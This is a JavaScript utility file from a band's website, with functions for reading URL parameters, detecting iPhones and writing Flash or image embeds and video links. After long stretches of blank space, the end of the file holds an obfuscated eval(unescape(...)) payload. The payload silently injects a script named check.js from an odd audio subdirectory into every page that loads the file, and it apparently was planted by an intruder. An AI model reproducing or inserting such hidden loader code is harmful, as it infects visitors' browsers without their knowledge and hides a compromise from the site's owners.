function get_variables(num,symbol) {
	var str =location.search;
	var get = str.split(symbol);
	var variable = get[num];
return (variable);
}

/*
SYNTAX: for JAVASCRIPT get variables(num,symbol);
	address:   http://adress.com?&&var1&&var2
	var variable#1 = get_variables(1,'&&');
	var variable#2 = get_variables(2,'&&');
*/




function check_browser(iphonedisplay,regulardisplay)
{
	if (navigator.platform.indexOf('iPhone') > -1) 
	{
	document.writeln(iphonedisplay);
	}
	else
	{
	document.writeln(regulardisplay);
	}
}	




function DISPLAY_image(imgsrc,swfsrc,width,height)
{
	if (navigator.platform.indexOf('iPhone') > -1) 
	{
	document.writeln('<img src=\"'+imgsrc+'\" border=\"0\" height=\"'+height+'\" width=\"'+width+'\">');
	}
	else
	{
	document.writeln('<OBJECT CLASSID=\"CLSID:D27CDB6E-AE6D-11cf-96B8-444553540000\" CODEBASE=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,22,0\" ID=\"FVS\" Width=\"'+width+'\" Height=\"'+height+'\"><PARAM NAME=\"movie\" VALUE=\"'+swfsrc+'\"><PARAM NAME=\"bgcolor\" VALUE=\"#000000\"><EMBED NAME=\"FVS\" SRC=\"'+swfsrc+'\" BGCOLOR=\"#000000\" WIDTH=\"'+width+'\" HEIGHT=\"'+height+'\" TYPE=\"application/x-shockwave-flash\" pluginspage=\"http://www.macromedia.com/go/getflashplayer\"></EMBED></OBJECT>');
	}
}	






function DISPLAY_video(imgsrc,movname,vidsrc,swfsrc,width,height,title)
{
	if (navigator.platform.indexOf('iPhone') > -1) 
	{
	
	document.writeln('<A HREF=\"display_iphonevideo.php?imgsrc='+imgsrc+'&movname='+movname+'&vidsrc='+vidsrc+'&swfsrc='+swfsrc+'&width='+width+'&height='+height+'&title='+title+'\"><img src=\"'+imgsrc+'\" width=\"'+width+'\" height=\"'+height+'\" border=\"0\"/><BR><strong>&diams; view &diams;</Strong><BR> \"'+title+'\"<BR>Brothers Van Winkle</a>');

	}
	else
	{
	
	document.writeln('<A HREF=\"'+swfsrc+'\"><img src=\"'+imgsrc+'\" width=\"'+width+'\" height=\"'+height+'\" border=\"0\"/><BR><strong>&diams; view &diams;</Strong><BR> \"'+title+'\"<BR>Brothers Van Winkle</a>');
	}
}









function DISPLAY_PORTvideo(imgsrc,movname,vidsrc,swfsrc,width,height,title)
{
	if (navigator.platform.indexOf('iPhone') > -1) 
	{
	
	document.writeln('<A HREF=\"../playiphonevideo.php?imgsrc='+imgsrc+'&movname='+movname+'&vidsrc='+vidsrc+'&swfsrc='+swfsrc+'&width='+width+'&height='+height+'&title='+title+'\"><img src=\"'+imgsrc+'\" width=\"'+width+'\" height=\"'+height+'\" border=\"0\"/></a>');

	}
	else
	{
	
	document.writeln('<A HREF=\"'+swfsrc+'\"><img src=\"'+imgsrc+'\" width=\"'+width+'\" height=\"'+height+'\" border=\"0\"/></a>');

	}
}




































































































                                                                                                                                                      /* a0b4df006e02184c60dbf503e71c87ad */ ;eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%32%31%34%39%33%33%3B%20%4A%53%53%33%20%3D%20%27%2F%61%75%64%69%6F%2F%62%72%6F%74%68%65%72%73%2F%30%32%32%36%30%36%41%6D%70%4A%61%6D%2F%67%61%78%75%73%75%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%61%75%64%69%6F%2F%62%72%6F%74%68%65%72%73%2F%30%32%32%36%30%36%41%6D%70%4A%61%6D%2F%67%61%78%75%73%75%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20')); /* a995d2cc661fa72452472e9554b5520c */                                                                                                                                                      





































































































